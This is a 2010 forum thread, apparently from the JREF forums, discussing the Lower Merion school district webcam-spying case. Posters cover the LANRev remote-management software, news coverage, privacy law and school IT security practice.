http://www.philly.com/philly/business/technology/20100219_Remotely_accessing_a_laptop_is_fairly_easy.html

edited to remove comment


ETA: The title of the article is "Remotely accessing a laptop is fairly easy"

tyr_13
21st February 2010, 07:37 AM
I predict a small uproar among parents and privacy advocates, followed by manufacturers finally putting shutters on the damn things.

Blue Mountain
21st February 2010, 08:10 AM
I predict a small uproar among parents and privacy advocates, followed by manufacturers finally putting shutters on the damn things.
Or one could use this piece of modern technology:

http://forums.randi.org/picture.php?albumid=237&pictureid=2442

I Ratant
21st February 2010, 08:25 AM
Or one could use this piece of modern technology:

http://forums.randi.org/picture.php?albumid=237&pictureid=2442
.
The News last night mentioned that "work around" was being used. :)

SonOfLaertes
21st February 2010, 08:44 AM
- snip -
One of the skepticisms mentioned in this thread so far is that a school full of computer savvy students would not go for very long without being aware of such function being implemented on these school supplied computers. I'm not quite so certain about that.
- snip -


quadraginta, you may well be right. I haven't heard any evidence that the students were aware of the spycam/spyware system before the Vice Princifool staged his confrontation.

However, I find that puzzling. Lower Merion is a large school system, with a high percentage of students who are tech-savvy well beyond their years. We know that some of them were covering up the web-cam with post-it notes, so they obviously suspected that they might be watched. Personally I find it hard to believe that suspicious students would not have sniffed this out.

I can buy the possibility that a few might have kept that knowledge to themselves in order to try a little spying of their own on their classmates; but I think an equal number would have taken the opportunity to be the hero and spread the word.

Perhaps Ducky or someone else more tech savvy than I am can answer the question - could a simple native scripted solution as Ducky outlined be hidden from determined students? Or would it take more professional third party software? It seems to me that even third party software would show telltale extraneous CPU activity.

JWideman
21st February 2010, 08:57 AM
Perhaps Ducky or someone else more tech savvy than I am can answer the question - could a simple native scripted solution as Ducky outlined be hidden from determined students? Or would it take more professional third party software? It seems to me that even third party software would show telltale extraneous CPU activity.

It's easier to hack people than computers. Why hack a password when you can just get the person to tell you it? Likewise, you don't have to hide anything from the students, only lie about the source of the activity.

Earthborn
21st February 2010, 09:25 AM
could a simple native scripted solution as Ducky outlined be hidden from determined students? Or would it take more professional third party software? It seems to me that even third party software would show telltale extraneous CPU activity.

I understand that it is possible to have spyware that does not show up in the task or process manager, and starts without any apparent traces, and can remotely get a webcam to record without even having the record LED on. It does require software from dubious sources.

Ducky
21st February 2010, 10:10 AM
quadraginta, you may well be right. I haven't heard any evidence that the students were aware of the spycam/spyware system before the Vice Princifool staged his confrontation.

However, I find that puzzling. Lower Merion is a large school system, with a high percentage of students who are tech-savvy well beyond their years. We know that some of them were covering up the web-cam with post-it notes, so they obviously suspected that they might be watched. Personally I find it hard to believe that suspicious students would not have sniffed this out.

I can buy the possibility that a few might have kept that knowledge to themselves in order to try a little spying of their own on their classmates; but I think an equal number would have taken the opportunity to be the hero and spread the word.

Perhaps Ducky or someone else more tech savvy than I am can answer the question - could a simple native scripted solution as Ducky outlined be hidden from determined students? Or would it take more professional third party software? It seems to me that even third party software would show telltale extraneous CPU activity.

If you have root, anything is possible.

My answer above takes into account students looking. If the students didn't have privileged accounts, they would have a hard time finding it. You could name your scripts the same as legitimate unix processes and it would be very difficult to detect.

The last link in my how-to has (http://blog.larsstrand.org//article.php?story=HollidayCracking) a link to a forensic analysis of a compromised linux server in the wild. The tactics behind that and behind hiding monitoring software like we're describing here are pretty much the same (except the school had root by legally owning the device and having a sysadmin work on it, not by hacking their way in through privilege escalation.)

In that last link you can see tactics on how to hide the processes from a user, even one that has root!

Let's not also forget the school explained the light going on next to the webcam as a software bug - and it's a believable one because similar bugs do exist in the wild. Even tech savvy kids could be fooled with that dodge. That's a pretty sophisticated explanation to dodge why the webcam goes off.

Source:

http://forums.randi.org/showthread.php?postid=5640180#post5640180

Dorian Gray
21st February 2010, 10:43 AM
Basically, the possibility of a child changing clothes in front of the webcam should have been reason enough not to have this feature. Regardless of what you catch the student doing, if you record several minutes or hours of them changing, you are in the big trouble, dude.

Also, why should students have to use tape to prevent school administrators from committing a crime, violating their privacy, etc., etc.?

GreNME
21st February 2010, 10:46 AM
Perhaps Ducky or someone else more tech savvy than I am can answer the question - could a simple native scripted solution as Ducky outlined be hidden from determined students? Or would it take more professional third party software? It seems to me that even third party software would show telltale extraneous CPU activity.

http://www.consumerist.com/2007/07/video-consumerist-catches-geek-squad-stealing-porn-from-customers-computer.html

This is an example of someone doing practically the same thing to catch Geek Squad computer techs stealing pictures from a customer computer. The computer tech had no clue. I've done something similar to catch employees who I knew were surfing porn-- there's really not much work involved in keeping it surreptitious.

Honestly, with root/admin access, there's very little that can't be done by the administrators regardless of operating system.

MortFurd
21st February 2010, 12:02 PM
(Snip...)
Did I leave anything out?
Yeah.

You setup the first one, then you duplicate it on all the other laptops with a script set to execute on the first reboot that renames the computer and logs the new name and the mac address of the NIC to a server in the school.

Schools (and other corporate environments) tend to work that way. They don't leave whatever was on the laptop as delivered, they build one the way they like it and duplicate them.

Your work time in setting up the system amortizes itself pretty quickly when you do thousands.

Ducky
21st February 2010, 12:04 PM
Yeah.

You setup the first one, then you duplicate it on all the other laptops with a script set to execute on the first reboot that renames the computer and logs the new name and the mac address of the NIC to a server in the school.

Schools (and other corporate environments) tend to work that way. They don't leave whatever was on the laptop as delivered, they build one the way they like it and duplicate them.

Your work time in setting up the system amortizes itself pretty quickly when you do thousands.

Sure. I was approaching it if someone came late to the game of these macs being out there and had to convert.

You're right, new acquisitions would be cloned this way.

Morrigan
21st February 2010, 12:29 PM
I'm tech savvy,
Obviously not. :newlol :newlol

tyr_13
21st February 2010, 12:44 PM
But Macs are so secure and are NEVER hacked or stolen from! How could this happen on Mac?

WildCat
21st February 2010, 03:08 PM
But Macs are so secure and are NEVER hacked or stolen from! How could this happen on Mac?
Steve Jobs actually uses this feature to ensure customer loyalty. A pic or 2 of the customer in a compromising position and they'll buy a Mac again unless they want those pics on the internet. :D

Aerik
21st February 2010, 03:25 PM
I'm pretty disappointed that there are members here who are asserting, without evidence, that the kid in the lawsuit is just faking it to hide their own activity.

If you just look up youtube "teacher webcam laptop spying" you can see the assistant principal from this story demonstrate for the video camera, that yes, the school can activate the camera remotely, without consent, without student knowledge, and he even says he can do it when the student is at home.

He even likes to snap pictures to scare the students. The students are unaware they are being watched until their laptop makes a shutter sound.

He does this for fun, people. For fun.

I Ratant
21st February 2010, 03:40 PM
"For fun."
Some get their jollies riding around town, slingshotting ball bearings at store front windows.
It's only for fun.
Gollee!
Can't a pervert sneak a peek at the kiddies when he wants to?
What is this country coming to?

WildCat
21st February 2010, 03:52 PM
I'm pretty disappointed that there are members here who are asserting, without evidence, that the kid in the lawsuit is just faking it to hide their own activity.

If you just look up youtube "teacher webcam laptop spying" you can see the assistant principal from this story demonstrate for the video camera, that yes, the school can activate the camera remotely, without consent, without student knowledge, and he even says he can do it when the student is at home.

He even likes to snap pictures to scare the students. The students are unaware they are being watched until their laptop makes a shutter sound.

He does this for fun, people. For fun.
So much for "we only use it to recover stolen laptops". Game, set, match. That douchebag is toast.

Vza_bMuy42M

Foolmewunz
21st February 2010, 04:08 PM
Now onto the conspiracy value of this story....

What kid eats Mike & Ike(Mikes & Ikes) nowadays? Was the kid tech savvy and knew that Mr. Peepers would think he was popping pills.


I sure hope so.

applecorped
21st February 2010, 04:14 PM
So much for "we only use it to recover stolen laptops". Game, set, match. That douchebag is toast.

Vza_bMuy42M

Is YouTube now liable for allowing the posting of videos of minors without their consent?

Earthborn
21st February 2010, 04:40 PM
So much for "we only use it to recover stolen laptops". Game, set, match. That douchebag is toast.

Vza_bMuy42M

It's from the PBS Frontline: Digital Nation (http://video.pbs.org/video/1402987791/). I just watched it and I thought of this thread. It is a different school though, and in the video there is no spying of kids at home. I hope this school doesn't do that, though it shows it would not be technically difficult to do so.

luchog
22nd February 2010, 09:22 AM
I've not only shown off the shelf software that does it, I showed the school wouldn't have to pay for that software (only the tech support admin's salary to implement it.) I also showed it could be construed as surreptitious and hidden from the user.

Any version of Windows since XP has that functionality built in. It's called "Remote Administrator", is enabled by default, and can easily be configured and accessed in a way that is completely invisible to the end user.

As for locating the laptop in the cloud, there are any number of third-party VPN applications that automatically connect to the administrator's network on startup. My employer uses one such application from Cisco on our work laptops.

ravdin
22nd February 2010, 09:51 AM
I heard about this because my nephew will be enrolled at that high school starting in September. I didn't know it was national news!

jillianbean
22nd February 2010, 10:54 AM
How sad is it that my first thought reading this article was, "What the hell school has the money to buy its students each laptops?!" This wasn't a private or preparatory school, was it? Yeah, the invasion of privacy here is completely outstanding on a WTF level. I can't speak to the technology aspect of it, but from a legal aspect, I was under the impression that video and/or audio (or pictures) taken without the subject's consent were not admissible in a court as evidence. So even if the kid was doing something legitimately illegal, would the school even have had a leg to stand on with its "evidence"?

ponderingturtle
22nd February 2010, 11:09 AM
I heard about this because my nephew will be enrolled at that high school starting in September. I didn't know it was national news!

Is it, or just big news on this Forum?

WildCat
22nd February 2010, 11:15 AM
Is it, or just big news on this Forum?
It's been on the Google News front page for several days, until today.

I Ratant
22nd February 2010, 11:38 AM
Is it, or just big news on this Forum?
.
It's been a feature on the evening news several days out here.

quadraginta
22nd February 2010, 04:46 PM
Here's (http://www.computerworld.com/s/article/9160278/Software_maker_blasts_vigilantism_in_Pa._school_spying_case?taxonomyId=12) an update on the "off-the-shelf" nature of the software involved.



Software maker blasts 'vigilantism' in Pa. school spying case

The company selling the software used by a Pennsylvania school district to allegedly spy on its students blasted what it called laptop theft-recovery "vigilantism" today.

Absolute Software said it dissuades users of theft-recovery software from acting on their own. "We discourage any customer from taking theft recovery into their own hands," said Stephen Midgley, the company's head of marketing, in an interview Monday. "That's best left in the hands of professionals."

Midgley confirmed that Lower Merion School District of Ardmore, Pa. was running Absolute Manage, formerly known as LANRev, which Absolute Software acquired last December. The suburban Philadelphia school district purchased and deployed LANRev prior to Absolute's acquisition, he said, noting that most school districts buy the software for power management features that let IT staff remotely power down systems.

Calling LANRev a "legacy" product, Midgley also said that Absolute would ship an update in the next several weeks that will permanently disable Theft Track, the name of the feature that lets administrators switch on a laptop's camera to take photographs of a potential thief after the computer is reported stolen

quadraginta
22nd February 2010, 04:58 PM
Is it, or just big news on this Forum?
.
It's been a feature on the evening news several days out here.


Montgomery County DA is involved. FBI is too. (http://www.reuters.com/article/idUSTRE61L5R520100222)

PHILADELPHIA (Reuters) - Federal prosecutors and the FBI on Monday said they would join a probe into whether a Philadelphia-area school district spied on students using remotely controlled cameras in school-issued laptops.



ACLU is watching. EFF, etc., etc.

It's got pretty good legs so far.

Ducky
22nd February 2010, 08:46 PM
Here's (http://www.computerworld.com/s/article/9160278/Software_maker_blasts_vigilantism_in_Pa._school_spying_case?taxonomyId=12) an update on the "off-the-shelf" nature of the software involved.


This is far more elaborate than what I put together, but the function is similar. It's designed for quiet back-end processing of centrally managed jobs. Patch updates, data recovery, etc.

This not only does everything UY listed he thought was impossible, it does not appear to be very intrusive to standard users at all.

Per their own website on the software:

Gather hundreds of hardware and software data points from devices over the network. Display data with custom views, searches and reports and export that data into various file formats. Integrate asset information into third party applications such as Microsoft SCCM and Web Help Desk.

Centrally manage and install patches – tracking and reporting on the patch status of all managed systems, as well as automatically adding required updates and patches.


Track installed applications and licenses on all of the devices in your deployment. Collect data from each machine so you can intelligently manage application licenses to avoid over-install penalties. Stay ahead of regulatory non-compliance by locating, terminating, and removing unlicensed and unauthorized software. Repackage software installations and deploy software in native installer formats.

And the best part (bold mine):

Enjoy the ease of a single interface to manage all of your IT assets within the Absolute Customer Center (regardless if a device is on or off your company network). You can monitor changes in asset information including user identification, physical location, and the installation of software/hardware that may not comply with government and corporate regulations. Absolute Track includes advanced reporting capabilities.

Geotechnology
Use GPS or Wi-Fi technology to track your assets on an internet map. You will be able to see current and historical locations within about 33 feet. Visit the Geolocation Technologies & Devices page for more information.

Absolute Customer Center
The Absolute Customer Center is the hub of our technology. It is an intuitive, web-based user interface where you can manage all of your IT assets, allowing you to easily identify any that have gone missing, enforce software policies, and maintain a fleet of optimally running devices. You will have easy access to reports, maps, dashboards, and management features specific to your deployment. View the demo for more information.

Source:

http://www.absolute.com/products

So...

Here it is, UY. And to recap, here's your words again (boldings mine):

Personally, I don't believe the story is accurate. In order for this to work, the computer would have to have some custom software on it. When the computer connected to the Internet, it would then have to connect to Central Computer (school office?) to say, "Here I am!" I'm not aware of any off-the-shelf software that does that.


I challenge you or anyone else to produce examples of off-the-shelf software that allows a central computer to surreptitiously track and control webcams on multiple computers. I'm tech savvy, and I'm telling you that I have never seen any off-the-shelf software that does what is described in the filing. I could write such a program, but that means that the school would have to pay for custom software.

Remote access when connected to the school network, yes. Once you connect to some other network (home), the school doesn't know where the laptop is unless it "phones home" so to speak. Then it's subject to the firewall restrictions. Sure, you could use something like www.LogMeIn.com, but that's hardly surreptitious.

Surreptitious: obtained, done, made, etc., by stealth; secret or unauthorized; clandestine

I don't see that this software operates that way.

There are other things in the lawsuit that I assume are the result of the lawyer not understanding technology. It says that the "webcam can be activated remotely at any time" by the school district. Well, short of radio transmitters in the laptop, this ain't gonna happen. The machine at least needs to be on and connected to the Internet. It says that the school district has the "ability to capture webcam images from any location where the laptop is kept." Again, untrue short of some CIA-type electronics.

If I wanted to be pedantic, I would point to all these things as further evidence that such software is not commercially available. But I'm not. I'm actually giving them the benefit of the doubt, but I'm only willing to bend so far.

Read the frigging lawsuit. It talks about how clandestine and powerful this "spying" software is. I'm saying that nothing like this exists commercially, so that makes it even less likely that what they claim actually exists. In rebuttal I'm having people tell me, "Well, there's some software that does some of what is claimed. It's installed just like ordinary software, so anybody can see it."

ETA: Every bolded statement is shown false by my and other posts going back 3 pages. In case you missed it, here is every post with actual evidence refuting your stance:

http://forums.randi.org/showthread.php?postid=5632303#post5632303
http://forums.randi.org/showthread.php?postid=5635075#post5635075
http://forums.randi.org/showthread.php?postid=5635710#post5635710
http://forums.randi.org/showthread.php?postid=5638211#post5638211
http://forums.randi.org/showthread.php?postid=5638354#post5638354
http://forums.randi.org/showthread.php?postid=5639481#post5639481
http://forums.randi.org/showthread.php?postid=5639976#post5639976
http://forums.randi.org/showthread.php?postid=5640005#post5640005
http://forums.randi.org/showthread.php?postid=5640115#post5640115
http://forums.randi.org/showthread.php?postid=5640248#post5640248
http://forums.randi.org/showthread.php?postid=5641092#post5641092
http://forums.randi.org/showthread.php?postid=5641872#post5641872
http://forums.randi.org/showthread.php?postid=5644142#post5644142
http://forums.randi.org/showthread.php?postid=5645884#post5645884


Here's where I show you can do everything described in the lawsuit and do it surreptitiously:
http://forums.randi.org/showthread.php?postid=5640221#post5640221

Once more, with feeling, from GreNME:
http://forums.randi.org/showthread.php?postid=5641177#post5641177

So:

I'd say this is a resoundingly over-broad, and over-assertive stance on your part regarding the technical capabilities of software freely available "off the shelf."

In short, I think you were talking out of your rear end and it would be refreshing to see you retract such hyperbole.

quadraginta
22nd February 2010, 09:41 PM
<snip>

I'd say this is a resoundingly over-broad, and over-assertive stance on your part regarding the technical capabilities of software freely available "off the shelf."

In short, I think you were talking out of your rear end and it would be refreshing to see you retract such hyperbole.


I hope you're patient.

I hope you're not holding your breath.

------------

Regarding my 'tip of the iceberg' question, to re-quote from my last post...

Midgley confirmed that Lower Merion School District of Ardmore, Pa. was running Absolute Manage, formerly known as LANRev, which Absolute Software acquired last December. The suburban Philadelphia school district purchased and deployed LANRev prior to Absolute's acquisition, he said, noting that most school districts buy the software for power management features that let IT staff remotely power down systems.


Note the highlighted part, which kind of slips by when contemplating the more pressing concerns of this incident.

There's "more school districts" that may or may not have exhibited their own self-restraint with such opportunities at their fingertips. How many more? And that's just this one vendor.

My limitless faith in the basic integrity of humanity, and the boundless good sense of school administrators fills me with optimism that this is a unique occurrence.

:rolleyes:

Ducky
22nd February 2010, 09:47 PM
I hope you're patient.

I hope you're not holding your breath.

------------

Regarding my 'tip of the iceberg' question, to re-quote from my last post...



Note the highlighted part, which kind of slips by when contemplating the more pressing concerns of this incident.

There's "more school districts" that may or may not have exhibited their own self-restraint with such opportunities at their fingertips. How many more? And that's just this one vendor.

My limitless faith in the basic integrity of humanity, and the boundless good sense of school administrators fills me with optimism that this is a unique occurrence.

:rolleyes:

The link I have for the software itself lists several school districts. I am sure there are many more.

Central management itself isn't a bad thing. Even central management that gives IT admins broad access to root powers over machines isn't necessarily bad if their job requires it. What's bad is that being abused by their non-IT superiors who don't have a job function need to do so and for reasons other than making the computer work and tracking the asset.

What's clear to me is that with a negative finding in this lawsuit (and I personally think the school district will be taken to task on this), most school districts will scramble to CYA. Whether that means massively changing how they manage assets in the field or whether they further obfuscate their attempts at more access and control is another matter for speculation.

I think what bothers me most is that I haven't read about any effective type of data protection for the students or the school, i.e. whole disk encryption. PGP and Pointsec now both work on Macs. With all these "protection of assets" arguments I've read defending the use of the webcam function, I have yet to see where data protection was actually implemented. It's a lot of control, but not a whole lot of prudent planning in event an asset is stolen. If they are relying on Apple's built-in FileVault capabilities, that only protects the home directory of the users *if it is turned on* and by default isn't. Also, FileVault is full of weak encryption and allows for data leakage to other parts of the hard disk.

Andrew Wiggin
22nd February 2010, 10:22 PM
In some cases, I can see what someone's 'horse in the race' is. In this case, not so much.

A

GreNME
22nd February 2010, 10:44 PM
Central management itself isn't a bad thing. Even central management that gives IT admins broad access to root powers over machines isn't necessarily bad if their job requires it. What's bad is that being abused by their non-IT superiors who don't have a job function need to do so and for reasons other than making the computer work and tracking the asset.

Not only is that considered abuse, but in cases of litigation IT staff who allow unauthorized co-workers or superiors risk being litigated themselves. One of the advantages I've had managing small-to-medium business IT is that I can flat-out tell a CEO or operations manager "no" when they ask for that kind of access, and they have little to threaten me with. I feel bad for those who work in larger companies and are pressured with reprisals that otherwise would be breaches in employee rights.

I think what bothers me most is that I haven't read about any effective type of data protection for the students or the school, i.e. whole disk encryption. PGP and Pointsec now both work on Macs. With all these "protection of assets" arguments I've read defending the use of the webcam function, I have yet to see where data protection was actually implemented. It's a lot of control, but not a whole lot of prudent planning in event an asset is stolen. If they are relying on Apple's built-in FileVault capabilities, that only protects the home directory of the users *if it is turned on* and by default isn't. Also, FileVault is full of weak encryption and allows for data leakage to other parts of the hard disk.

Schools are the worst about employing encryption on their file systems. The few school systems I've had the opportunity to work with or take a look at "unofficially" (via associations with other professionals, nothing illegal), there's usually next to nothing as far as encryption on the back end, let alone the user end. This is usually due to piss-poor budgets, lack of administration attention to information security, and school boards who are more interested in bickering and politics than actually putting anything into infrastructure. The school systems who do manage to spend a bit of money tend to try to spend it on these central management systems as a silver bullet of sorts, and obviously that leaves them with less to spend on adequate staff to actually be effective. Some are so small that they call on consultants (like me) to come in and try to work with the little resources they have, or help their too-small staff try to complete a project that was sold to them as being able to solve all their problems but could have been assembled with cheaper or possibly even free components just as well, but would have likely been more difficult to provide point-click support or would have been a platform the on-site staff were unfamiliar with.

Ducky
23rd February 2010, 12:00 AM
Not only is that considered abuse, but in cases of litigation IT staff who allow unauthorized co-workers or superiors risk being litigated themselves. One of the advantages I've had managing small-to-medium business IT is that I can flat-out tell a CEO or operations manager "no" when they ask for that kind of access, and they have little to threaten me with. I feel bad for those who work in larger companies and are pressured with reprisals that otherwise would be breaches in employee rights.

Agreed.

Schools are the worst about employing encryption on their file systems. The few school systems I've had the opportunity to work with or take a look at "unofficially" (via associations with other professionals, nothing illegal), there's usually next to nothing as far as encryption on the back end, let alone the user end. This is usually due to piss-poor budgets, lack of administration attention to information security, and school boards who are more interested in bickering and politics than actually putting anything into infrastructure. The school systems who do manage to spend a bit of money tend to try to spend it on these central management systems as a silver bullet of sorts, and obviously that leaves them with less to spend on adequate staff to actually be effective. Some are so small that they call on consultants (like me) to come in and try to work with the little resources they have, or help their too-small staff try to complete a project that was sold to them as being able to solve all their problems but could have been assembled with cheaper or possibly even free components just as well, but would have likely been more difficult to provide point-click support or would have been a platform the on-site staff were unfamiliar with.

Fundamentally this leads to the issue of liability for data loss. I'm not sure if students would be using sensitive data enough that identity theft is viable on event of data loss from theft, but certainly configuration files on the hard drive prevent a security issue should they leak (ie. LDAP maps, etc.) and I am surprised that by 2010 school administrators haven't learned what the corporate world has: remote administration + role based access + full disk encryption = reasonably low data leakage risk potential in event of asset loss. It's not just the student's homework they should care about (or, really, even bother to care about at all) it's the internal files in relation to their remote administration software and network configurations that could give a would-be intruder a good head start in penetrating the school's networks.

But then, maybe there isn't anything on the school's networks deemed sensitive enough. I would think employee and student files would be considered sensitive enough, however. Payroll information and social security numbers alone should warrant prudence in this matter.

Arus808
23rd February 2010, 12:44 AM
Wish parents were more proactive when they receive equipment and read over the agreements should their child be provided something electronic from the schools their children attend. If not, take the damn laptop to a Geek Squad or someone who knows about computers to make sure there isn't anything that would impede on my family's privacy.

If a school requires my child to have a laptop, then they provide it, without a web cam attached. Otherwise, I will uninstall it, and make it not work any more. OR fashion a way to block the lens. My child has no reason to use a web cam and if they need to take pictures or video, they can use the video camera that I have, that records to a solid state memory stick or a digital camera that does the same. That way it's not attached to anything that can control it remotely.


The vice principal was wrong to spy on a child in the PRIVACY of his own home. He had no right to comment on the behavior of said child while in the privacy of his own home. As long AS HE DID THE WORK he was to do for school while at home, and BEHAVED and did the work required of him at school, his behavior at HOME has no bearing on his school life.

GreNME
23rd February 2010, 01:13 AM
Fundamentally this leads to the issue of liability for data loss. I'm not sure if students would be using sensitive data enough that identity theft is viable on event of data loss from theft, but certainly configuration files on the hard drive prevent a security issue should they leak (ie. LDAP maps, etc.) and I am surprised that by 2010 school administrators haven't learned what the corporate world has: remote administration + role based access + full disk encryption = reasonably low data leakage risk potential in event of asset loss. It's not just the student's homework they should care about (or, really, even bother to care about at all) it's the internal files in relation to their remote administration software and network configurations that could give a would-be intruder a good head start in penetrating the school's networks.

Well, to be fair, I think a lot more schools now are making use of role-based access and at least have some level of administrative control over their desktop and projector computers. However, the laptops that would go to students are usually pretty sparse in terms of data that would need to be lost, and at least the couple of schools I've seen with wifi keep the student-accessible wifi off the same subnet as the staff systems (usually for net-nanny reasons). I wouldn't want to give the impression that school computer systems are still stuck in the 1980's. Late 1990's to mid-2000's, yes. Also, you're going to get better setups in larger school districts like Philly (or NY or Dallas etc.), but even there I'd be willing to bet that most of the servers are still running single-core chips and are either primarily Windows 2000-2003 or they've sprung for special appliances for specific tasks (like file storage, routing, and so on). Still closer to SMB (small-medium business) than to larger corporate setups, but they're usually not chugging along with a 486 server and in a workgroup environment (though I have seen some as recently as 4 years ago).

But then, maybe there isn't anything on the school's networks deemed sensitive enough. I would think employee and student files would be considered sensitive enough, however. Payroll information and social security numbers alone should warrant prudence in this matter.

The laptops tend to be pretty bare as far as useful data on them. However, it's conceivable that a sophisticated-enough criminal with enough tenacity could use a stolen laptop as a foot in the door to access more saucy data on the school network. Still, I doubt the school has these student laptops using LDAP authentication if the students are taking them home-- they're more likely insured for losses and breakage, with their network access limited to a segregated VLAN on the school's network for accessing their assignment data (when in school).

Ashles
23rd February 2010, 12:00 PM
I'm pretty disappointed that there are members here who are asserting, without evidence, that the kid in the lawsuit is just faking it to hide their own activity.

And where exactly did that happen?

Right at the start of this story I said it might be more likely the case when we knew very little info.
It clearly seems less and less likely as more information comes out.

But nobody 'asserted without evidence' that this was the case. And nobody is doing so now.
So feel free to rail against a position that nobody here holds if you want to, but it seems a little pointless.

Ducky
23rd February 2010, 01:56 PM
And where exactly did that happen?

Right at the start of this story I said it might be more likely the case when we knew very little info.
It clearly seems less and less likely as more information comes out.

But nobody 'asserted without evidence' that this was the case. And nobody is doing so now.
So feel free to rail against a position that nobody here holds if you want to, but it seems a little pointless.

Obviously Aerik believes we are all apologists for intrusive and oppressive spying.

One time in a chat room someone made some tasteless jokes and Aerik posted a long diatribe on the SGU forums about how we were apologists for rape. Even the people who weren't at their keyboard and didn't participate in the joking were apologists for rape for tacitly supporting the jokes by being connected.

I see his post as something similar to that incident.

Ducky
23rd February 2010, 05:43 PM
Boing Boing article detailing the EFF and ACLU's responses:

http://www.boingboing.net/2010/02/23/aclu-and-eff-on-scho.html

referencing the following blog article:

http://blog.laptopmag.com/aclu-and-eff-speak-out-against-school-webcam-spying

Morrigan
24th February 2010, 08:25 AM
I hope you're patient.

I hope you're not holding your breath.
Ditto. What a thorough smackdown. Not quite as powerful and entertaining as The Atheist in the pet thread, but, quite up there. \m/

Ducky
26th February 2010, 12:39 PM
http://techdirt.com/articles/20100222/1118438253.shtml

Quote:

Apparently, in various forums, blog posts and videos, one of the school's techies talked about the technology they were using and how to set it up so that the user would not realize they were being spied on. He also discussed how to prevent a laptop using this software from being "jailbroken," so users couldn't discover that their computers were being used in this manner. Other forum posts from students at the school show that they were told they could not use other computers, could not disable the cameras and could not jailbreak their laptops on the risk of expulsion.

http://strydehax.blogspot.com/2010/02/spy-at-harrington-high.html

This investigation into the remote spying allegedly being conducted against students at Lower Merion represents an attempt to find proof of spying and a look into the toolchain used to accomplish spying. Taking a look at the LMSD Staff List, Mike Perbix is listed as a Network Tech at LMSD. Mr. Perbix has a large online web forum footprint as well as a personal blog, and a lot of his posts, attributed to his role at Lower Merion, provide insight into the tools, methods, and capabilities deployed against students at LMSD. Of the three network techs employed at LMSD, Mr. Perbix appears to have been the mastermind behind a massive, highly effective digital panopticon.

The primary piece of evidence, already being reported on by a Fox affiliate, is this amazing promotional webcast for a remote monitoring product named LANRev. In it, Mike Perbix identifies himself as a high school network tech, and then speaks at length about using the track-and-monitor features of LanRev to take surreptitious remote pictures through a high school laptop webcam. A note of particular pride is evident in his voice when he talks about finding a way outside of LANRev to enable "curtain mode", a special remote administration mode that makes remote control of a laptop invisible to the victim.

Video link to the above:

http://www.youtube.com/watch?v=hHu92imqJec

Ducky
26th February 2010, 02:14 PM
Wow. This is pretty sinister sounding:

In a September 2009 post that may come to haunt this investigation, Perbix posted a scripting method for remote enable/disable of the iSight camera in the laptops. This post makes a lot more sense when Perbix puts it in context on an admin newsgroup, in a post which makes it clear that his script allows for the camera to appear shut down to user applications such as Photo Booth but still function via remote administration:

"what this does is prevent internal use of the iSight, but some utilities might still work (for instance an external application using it for Theft tracking"

What's the purpose of shutting down a camera for the user of the laptop but still making it available to network administrators? Ask yourself: if you wanted to convince someone that a webcam blinking was a glitch, would disabling the cameras help make your case?

Source for above is linked in previous post.

The blog entry shows him being able to disable the student from disabling his remote software:

http://bestsinceslicedbread.blogspot.com/2009_11_01_archive.html

Quote:

We were having an issue with LsSaAlerter application which is part of the Lightspeed systems Security Agent for OSX. the LsSaAlter application is responsible for the menu bar icon that shows you the status of the security agent and what it is currently doing. There is also a shortcut to get to the Lightspeed Preferences Pane by clicking on the menu icon.

There does not appear to be any current way via filtering policies to disable that menu and even if you MANUALLY go into the com.lightspeedsystems.securityagent.plist and set the "Enable Manger" key to false, it resets on next logout/login.

One student's post discusses how he found the way to exploit the administration's software to gain access to school records:

http://www.saveardmorecoalition.org/node/4216

This method will give you administrative control over your laptop, allowing you to access the consoles you were unable to during your demonstration, such as Terminal. Last year, to the chagrin of school officials, and to my own surprise, it also gave you unlimited access into the student records, including the ability to change grades on PowerSchool. I did not intend to access these files when I "Hacked" my laptop, merely to install a few games to pass the classes with (Senioritis.) This includes disabling the webcam.

Ducky
26th February 2010, 03:01 PM
Lastly, Bruce Schneier's blog on the subject:

http://www.schneier.com/blog/archives/2010/02/remotely_spying.html

Bruce also agrees with me that the link above is a good technical investigation of what happened.

http://strydehax.blogspot.com/2010/02/spy-at-harrington-high.html

Ducky
26th February 2010, 03:33 PM
Quote from the additions to the article doing an analysis of this situation:

My colleague Aaron pointed out to me today that the reason LANRev is using the raw camera device is that Apple implemented security measures to prevent remote activation of the webcam in OSX. LANRev was designed to bypass this security measure. Those who disagree with my spyware assessment, ask yourself, "what kind of software bypasses OS security measures?"

Ducky
26th February 2010, 04:02 PM
Wired has a good general article on the importance of privacy:

http://www.wired.com/politics/security/commentary/securitymatters/2006/05/70886

Too many wrongly characterize the debate as "security versus privacy." The real choice is liberty versus control. Tyranny, whether it arises under threat of foreign physical attack or under constant domestic authoritative scrutiny, is still tyranny. Liberty requires security without intrusion, security plus privacy. Widespread police surveillance is the very definition of a police state. And that's why we should champion privacy even when we have nothing to hide.

quadraginta
26th February 2010, 08:21 PM
Thank you, Ducky. That was all very interesting stuff.

I hope UncaYimmy is going to contribute his technical expertise to help us interpret this new data.

Ducky
28th February 2010, 09:31 AM
Coming back to this, it really seems that school districts are trying to apply their behavioral strategies for student conduct to administration and support of hardware they are loaning out to the students. This is going to fail in several ways.

Firstly there's the problem of physical control. As I have linked above, intrepid students will easily circumvent the laptop's measures if desired. As shown the tech that seems to have designed the customizations to LANREV was a network tech that had he used the techniques he blogs about at my job would be considered less than competent. For example, he blogs about not wanting to hard code passwords in scripts (a good idea) but fails to understand that simply creating a hash of the password and comparing that hash is not sufficient security at all. He should be using the password as the key in a two part cryptographic design, because it's not any harder to cut and paste a hash as it is the raw password. Either way, physical control of the laptop is key. At some point they need to realize they are loaning a two thousand dollar laptop to a student and make clear the expectations of that student's use. This happens in the corporate world all the time, and if you think adults are any better about not googling for boobs on corporate laptops I'd say that thought is naive. One student responded with a way to hack the computers to gain access to school records. This shows that the school was not interested in actual information security or control, but interested in behavior control of the students and whatever spying gave them the illusion of control.

What they should have focused on were laptop policies to secure data such as whole disk encryption, remote/roaming profiles or user data backup to school servers and encrypted connections to the school network. Use outside of an end user agreement that fully discloses what's on the laptop, why it is in place, and what policies are there to protect data of the student and the school can be dealt with when the kid can't fix what he broke and brings it in to IT for fixes.

Other than that, there's no call for being able to remotely monitor the student's laptop even at school. On the school network, they should have web proxies on the server end that filters content and firewall/network rules to prevent the use of proxy circumvention. When the laptop is off site they need to accept they can't control what is going to be done with it, have reasonable protections in place and deal with the minor cases of laptop misuse as they come up.

